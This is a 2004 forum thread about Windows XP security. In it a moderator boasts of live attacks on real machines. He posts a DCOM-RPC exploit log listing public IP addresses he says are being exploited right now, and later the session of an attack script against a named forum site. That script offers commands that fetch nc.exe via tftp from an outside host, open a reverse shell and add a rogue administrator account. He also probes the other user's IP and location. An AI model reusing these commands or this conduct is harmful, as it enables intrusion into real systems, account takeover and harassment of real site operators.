| Author |
Topic |
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 08 Jun 2004 : 21:26:27
|
Will appreciate your info on this matter, which is a growing concern nowadays due to the wide introduction or availability of Microsoft’s networking operating system WinXP. Since most ordinary people do not understand what there up against, Its time to expose what you folks might be exposed to, Here, On this tangled, funny duddy fantasy land called the Net. So, ask away!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 08 Jun 2004 : 22:01:02
|
does the port 139 exploit still exist in XP pro with all the powerpacks (SPs)??
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:00:22
|
DCOM-RPC, Remote Procedure Call (RPC) exploit shouldn't work on a fully patched XP OPS! So your safe, for now! Netbios share filtration shouldn't work either unless your drives are open for shareing to others on either your LAN, or the net!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 03:05:35
|
what about intra LAN shares?
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:05:56
|
http://www.firewallleaktester.com/tools/wwdc.exe
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:07:28
|
Are you at university Jemsbhai? Because your IP, Although highly protected and firewalled suggests that?
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 03:08:13
|
exactly the problem. i need those ports open as the network shares resources ...
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:10:49
|
Are you located somewhere south of america, Miami perhaps?
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 03:12:20
|
yes yes. all that too. u see, basically this network is an insecure piece of ***** ... but if jemsbhai can reconfigure it to withstand devastating attacks, then jemsbhai will no longer have to hunt rodents for lunch ...
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:17:11
|
The only thing which an outside scanner can sniff out is SMTP port 25, which is exposed on your computer right now to the outside world, Can be used to send anonymous email to others, or would take a pretty wicked hacker to exploit it to exploit your computer and the computers on your local network. Other then that if one of the computers on your local network is comprised which I guess could be the case, used for file sharing purposes in IRC servers, then the other computers on that the same network niche may also be at risk! :) From the inside that is!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:20:29
|
DCOM: connected to pipe \\67.68.74.250\pipe\epmapper.
DCOM: connected to pipe \\67.68.74.24\pipe\epmapper.
DCOM: connected to pipe \\67.68.74.164\pipe\epmapper.
DCOM: connected to pipe \\192.168.2.116\pipe\epmapper.
DCOM: connected to pipe \\67.68.74.27\pipe\epmapper.
DCOM: connected to pipe \\67.68.74.27\pipe\epmapper.
DCOM: connected to pipe \\67.68.74.189\pipe\epmapper.
DCOM: connected to pipe \\192.168.2.104\pipe\epmapper.
All of the above machine are being exploited as I speak, and 129. University ranges are also common amongst scanned and exploited targets! :) Talk to your network administrator or whoever runs your network and make sure if there doing there job correctly and that everythings tip-top and secure! Routers, firewalls, switches, whatever!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 03:22:45
|
use YAPS or snort, and you will find that in the 129.171.* range there are several ports in the p > 4500 range open, some of them are unfirewalled. plus due to the huge volume of users, there can always be an average of 10 systems ATLEAST compromised at any given time. plus there is the wireless cloud, comprising a few adhoc networks here and there. the firewall is desperately inadequate protection for anyone with a few hours and a motive to take this system down. i was laid off last year for administrative reasons, now there is an offer of network admin open in the fall ... good paying job, its mine if i can make the system (more) secure ... the main problem seems to be not the few ports open here and there, but moreso the mobile adhoc networks ...
Maybe life is just a dream |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 03:24:41
|
they ARENT, and thats why the position is opening ... recently our network was hit with a wave of attacks, it appears that the finally the administration realised the network ppl are a bunch of idiots ...
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:29:09
|
You seem like you know what your talking about jemsbhai, An IT verteran to say the least. Its very simple taking down a system, Takes a few minutes or a good half an hour of constant bombardment, Depending on what the attackers hitting you with! Patching up your system may also be fairly easy but like you said the mobile adhoc networks are harder to patch up, But thats a new territory for me!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:30:04
|
DDOS attacks? Syn floods?
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 03:33:15
|
see, the more distributed the network, the harder it gets to secure. atleast in theory. knowing users, u expect users to do stupid stuff, so u put in "stupid proof" measures. however that becomes a problem with adhoc networking, especially since ur level of control over rules dramatically decreases ... and there lies the basic problem of my univ's network (damn i sound like my prof) anyhows thanx bro it was good talkin to u, i gotta jet for dinner now, well continue this conversation later ... good nite ...
Maybe life is just a dream |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 03:33:30
|
now wheres that monkey ...
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 09 Jun 2004 : 03:34:24
|
Sure, But is your connection lagging or anything? Let me know if it is!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 09 Jun 2004 : 05:31:49
|
yes it is ... must be the trans atlantic lag ...
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 10 Jun 2004 : 22:54:45
|
Get many of those down your ends do ya? Trans i mean!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com |
|
|
|
|
jemsbhai
Super Member
USA
3566 Posts
|
Posted - 11 Jun 2004 : 02:45:08
|
all the time!! ... now the first thing i check is for camel toe ...
Maybe life is just a dream |
|
|
|
|
BengaLTiger
Moderator
United Kingdom
1882 Posts
|
Posted - 11 Jun 2004 : 22:09:25
|
https://asianforum.co.uk/forum/readme_admin_email_config.gif
C:\WINDOWS\system32>nc
Cmd line: -l -p 666
C:\Documents and Settings\Leader\Desktop\DDOS>snitz.pl
Remote command execution against **** Forums
You accept full responsibility for your actions by using this script.
INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!
Web server? [OoO There dead now]: asianforum.co.uk
Web server port? 80
path to "register.asp"? [/forum/register.asp]: /forum/register.asp
Command to execute
1: tftp -i 69.69.69.69 GET nc.exe
2: nc.exe -e cmd.exe 69.69.69.69 666
or: net user Bengaltiger /add | net localgroup Administrators Bengaltiger /add
Your command:
Should BT pounce now and totally destroy asianforum .. hmmm .. 2 be continued!
//////////////// [BengalTiger ] ////////////////
http://www.Banglachat.net
http://www.Bdchat.com
.....("`-/")_.-'"``-._
.......|.,`;.-._....)-;-,_`)
.....(v_,)'.._..)`-.\...``-'
...._.- _..-_/./.((.'.....BT
..((,.-'...((,/ |
|
|
|
|
EDITINGTXTFILESAINTELITE
Starting Cub
Bolivia
8 Posts
|
Posted - 12 Jun 2004 : 00:43:03
|
| read the nick |
|
|
|
|
EDITINGTXTFILESAINTELITE
Starting Cub
Bolivia
8 Posts
|
Posted - 12 Jun 2004 : 00:44:36
|
| neither is reading em and following like a zombie |
|
|
|
| |
Topic |
|